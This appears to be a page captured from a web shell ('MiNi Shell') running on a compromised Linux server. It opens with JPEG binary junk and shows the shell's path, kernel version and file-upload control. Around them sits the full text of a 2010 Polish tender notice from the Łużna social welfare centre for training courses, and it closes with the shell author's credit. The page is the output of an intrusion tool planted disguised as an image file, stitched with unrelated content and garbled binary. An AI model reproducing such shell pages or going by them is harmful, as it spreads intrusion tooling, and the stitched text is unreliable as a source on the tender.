JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100525/142664-N-2010.html

<p class="kh_header"><b>Łużna: Szkolenia i kursy zwiazane z realizacją zadania I projektu  Aktywni na rynku pracy i nie tylko..</b><br>
<b>Numer ogłoszenia: 142664 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośodek Pomocy Społecznej w Łużnej , Łużna 634, 38-322 Łużna, woj. małopolskie, tel. 18 3543041, faks 18 3543041.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> BIP Gmina Łużna</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia i kursy zwiazane z realizacją zadania I projektu  Aktywni na rynku pracy i nie tylko...</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń i kursów dla 28 osób  GOPS w Łużnej - współfinansowanych ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. w związku z realizacją projektu Aktywni na rynku pracy i nie tylko...
CZĘŚĆ I:
- Sprzedawca z obsługą kasy fiskalnej i praktyką zawodową- dla 10 osób;
CZĘŚĆ II:
- Pomoc kucharza-dla 10 osób ;
CZĘŚĆ III:
- Operator wózków widłowych-dla 8 osób;
CZĘŚĆ IV:
- Trening kompetencji i umiejętności społecznych wraz z warsztatami treningu motywacyjno - integracyjnego-dla 28 osób;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.00.00.00-4, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 21.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu może wziąć udział Wykonawca, który spełnia warunki określone w art. 22  ust. 1 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych Dz. U. z 2007r. nr 223, poz. 1655 z późn. zm.) dotyczące: 
1)posiadania uprawnień do wykonywania działalności lub czynności z zakresu przedmiotu zamówienia,
2)posiadania wiedzy i doświadczenia,
3)dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4)sytuacji ekonomicznej i finansowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust. 1 pkt. 1-4 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych                         (Dz. U. z 2007r., nr 223, poz.1655 z późn. zm.), zgodnie ze wzorem stanowiącym załącznik nr 2; potwierdzenie spełniania warunków, 
o których mowa w art. 22 ust 1 pkt. 1 - 4 musi zostać wykazane, zgodnie 
z art. 26 ust. 2a w/w Ustawy, nie później niż na dzień składania ofert;

wykaz wykonanych usług w zakresie przedmiotu zamówienia, 
tj. zrealizowanych przynajmniej dwóch szkoleń w zakresie przedmiotu zamówienia  potwierdzone  dokumentem potwierdzającym, że te usługi zostały wykonane należycie (np. referencje);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I zamówienia :Wykonawca realizujący szkolenie zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia, sala wyposażona w niezbędny sprzęt. Sprzęt niezbędny do przeprowadzenia szkolenia: laptop z rzutnikiem do prezentacji multimedialnych, tablica itp. 
Sala wykładowa (ogrzewana w okresie grzewczym) wyposażona w stół, krzesła dla każdego uczestnika. Dostęp do kasy fiskalnej minimum: 1 kasa na 2 Beneficjentów Ostatecznych.
Dla II części zamówienia :Wykonawca realizujący szkolenie zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia, sala wyposażona w niezbędny sprzęt. Przez sprzęt niezbędny do przeprowadzenia szkolenia rozumie się: laptop z rzutnikiem do prezentacji multimedialnych, tablica itp.Sala wykładowa (ogrzewana w okresie grzewczym) wyposażona w stół, krzesła dla każdego uczestnika. 
Dla III  części zamówienia:Wykonawca realizujący szkolenie zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia, sala wyposażona w niezbędny sprzęt. Za sprzęt niezbędny do przeprowadzenia szkolenia uznaje się: laptop z rzutnikiem do prezentacji multimedialnych, tablica itp. Sala wykładowa (ogrzewana w okresie grzewczym) wyposażona w stół, krzesła dla każdego uczestnika. Zajęcia praktyczne powinny odbywać się w ten sposób , że z 1 wózka będzie korzystało nie więcej niż  2 osoby. 
Dla IV częsci zamówienia:Wykonawca realizujący szkolenie zapewni warunki zgodnie z przepisami bezpieczeństwa i higieny pracy w trakcie trwania szkolenia, sala wyposażona w niezbędny sprzęt. Za sprzęt niezbędny do przeprowadzenia szkolenia uznaje się: laptop z rzutnikiem do prezentacji multimedialnych, tablica itp. Sala wykładowa (ogrzewana w okresie grzewczym) wyposażona w stół, krzesła dla każdego uczestnika</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zajęcia powinny zostać przeprowadzone przez osobę posiadającą odpowiednie wykształcenie kierunkowe oraz powinni posiadać kwalifikacje i doświadczenie w prowadzeniu szkoleń objętych przedmiotem zamówienia, przeprowadzić co najmniej dwa kursy z zakresu przedmiotu zamówienia potwierdzone dokumentami tj rekomendacje itp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunków, o których mowa w ust. 1 i 2        na podstawie treści złożonych przez Wykonawcę dokumentów i oświadczeń wymaganych w rozdziale V ,SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) oświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy  (WUP) właściwy ze względu na adres siedziby instytucji szkoleniowej
2) program szkolenia
3) harmonogram szkolenia
4) preliminarz kosztów</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Program szkolenia - 20</li>
<li>3 - Baza lokalowa i wyposazenie w sprzet i pomoce dydaktyczne - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> BIP Gmina Łużna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Łużnej, Łużna 634, 38-322 Łużna pokój nr.4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2010 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Łużnej pokój nr.4..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia bedą realizowane w ramach projektu Aktywni na rynku pracy i nie tylko... współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> NAZWA:   KURS SPRZEDAWCA Z OBSŁUGĄ KASY FISKALNEJ I PRAKTYKĄ ZAWODOWĄ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin  teoretycznych 40,  zajęć praktycznych 100.
Kursem zostanie objęte 10 osób.
Szkolenie powinno zostać zrealizowane z wykorzystaniem modułowego programu szkolenia zawodowego dla zawodu sprzedawca .Szkolenie powinno składać się  z następujących bloków tematycznych :I OBSŁUGA KASY FISKALNEJ : - część teoretyczna i część praktyczna z następujących zagadnień: 
1.Podstawowe akty prawne związane ze zastosowaniem kas fiskalnych
2.Budowa, zasady działania oraz podział urządzeń fiskalnych
3.Przygotowanie kasy do pracy
4.Sprzedaż, wykonywanie raportów
5.Współpraca kas z urządzeniami dodatkowymi: czytnikiem kodów, komputerem
6. Praca kasjera ( odpowiedzialność, ochrona wartości pieniężnych, raport kasowy, niedobory i nadwyżki w kasie itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Program szkolenia - 20</li>
<li>3. Baza lokalowa i wyposażenie w sprzęt i pomoce dydaktyczne - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KURS POMOC KUCHARZA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin szkolenia: 140 godzin  w tym; 40 godzin zajęć teoretycznych i 100 godzin zajęć praktycznych. 
Ilość uczestników szkolenia: 10 osób.
Celem  zamówienia jest  nabycie przez kursantów umiejętności i wiedzy niezbędnej do przygotowywania :
-prostych i tanich posiłków, 
-przygotowanie zdrowego i urozmaiconego jadłospisu,
 -rozporządzania budżetem domowym ,
-efektywne wykorzystanie produktów z uwzględnieniem zasad BHP.
Zajęcia praktyczne powinny odbywać się w pracowni gastronomicznej wyposażonej w niezbędny sprzęt: garnki ,naczynia , zastawę stołową, urządzenia mechaniczne itp. oraz  produkty żywnościowe niezbędne do zajęć praktycznych, które zapewni Wykonawca. 
  Szkolenie powinno zostać zrealizowane z wykorzystaniem modułowego programu szkolenia zawodowego dla zawodu pomoc kucharza ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 21.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Program szkolenia - 20</li>
<li>3. Baza lokalowa i wyposażenie w sprzęt i pomoce dydaktyczne - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KURS OPERATOR WÓZKÓW WIDŁOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin szkolenia: 60 godzin  w tym; 45 godzin zajęć teoretycznych i 15 godzin zajęć  praktycznych.Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 8 - osobowej grupy  pod nazwą Operator wózków widłowych.
Zajęcia odbywać się powinny w 1 grupie szkoleniowej (poza częścią praktyczną).
Program szkolenia winien być opracowany w oparciu o rozporządzenie Ministra Edukacji Narodowej oraz Ministra Pracy i Polityki Socjalnej z dnia 12 października 1993 roku w sprawie zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych (Dz. U.  Nr 103, poz.472 z pózn. zm.) i rozporządzenie MPIPS  z dnia 2 marca 2007 roku w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U.   Nr 47, poz. 315)
Celem szkolenia jest uzyskanie wiadomości i praktycznych umiejętności w zakresie prowadzenia i obsługi wózka widłowego, jak również zapoznanie się z budową i zasadą działania wózków rożnych typów pozwalających na ich prawidłową eksploatację. Przygotowanie absolwenta do samodzielnego prowadzenia wózka i wykonania  operacji manewrowych osprzętem wózka oraz jego obsługi codziennej. Zaznajomienie z obowiązującymi przepisami BHP, zasadami poruszania się po terenie zakładu pracy. 

Program szkolenia obejmuje:
a) zajęcia teoretyczne z zakresu budowy i typów wózków, czynności kierowcy przy  obsłudze wózków, bhp i dozoru technicznego przy eksploatacji wózków, 
- typy stosowanych wózków jezdniowych,
- budowa wózka,
- czynności kierowcy przy obsłudze wózka widłowego przed  podjęciem pracy i po   pracy wózka,
- czynności kierowcy w czasie pracy wózkami,
- wiadomości z zakresu ładunkoznawstwa,
- wiadomości z zakresu BHP,
- wiadomości z dozoru technicznego,
b) zajęcia praktyczne nauki jazdy i manewrowania wózkiem.
-  praktyczna nauka jazdy wózkiem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Program szkolenia - 20</li>
<li>3. Baza lokalowa i wyposazenie w sprzęt i pomoce dydaktyczne - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> TRENING  KOMPETENCJI IUMIEJETNOSCI SPOŁECZNYCH WRAZ Z WARSZTATAMI TRENINGU MOTYWACYJNO- INTEGRACYJNEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin szkolenia: 56 dla  grupy. 1 godzina zajęć wynosi 45 minut. Liczba godzin dziennie - 7 godzin.   
Ilość uczestników szkolenia: 28 osób. 
Zajęcia mogą się odbywać w 2 grupach szkoleniowych. 
Szkolenie powinno obejmować następującą tematykę:
- Przełamywanie barier - kreatywność i asertywność 
- Zdobycie wiedzy z zakresu komunikacji, asertywności
- Nabycie umiejętności w zakresie sposobów rozwiązywania konfliktów,
- Nabycie umiejętności w zakresie radzenia sobie z sytuacjami trudnymi w życiu osobistym oraz w pracy
- Poznanie umiejętności radzenia sobie z obowiązkami życia codziennego
-Poznanie umiejętność zarządzania własnym budżetem 
-Sztuka rozmowy - skuteczne komunikowanie się z ludźmi
-Autoprezentacja podczas rozmowy kwalifikacyjnej
- Likwidowanie barier uniemożliwiających aktywizację społeczną
- Kształtowanie indywidualnych i grupowych relacji interpersonalnych
- Budowanie samo - motywacji do podejmowania działań i i wprowadzania zmian w życiu
- Budowanie własnego wizerunku poprzez komunikację,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Koszt szkolenia - 20</li>
<li>3. Baza lokalowa i wyposazenie w sprzet i pomoce dydaktyczne - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com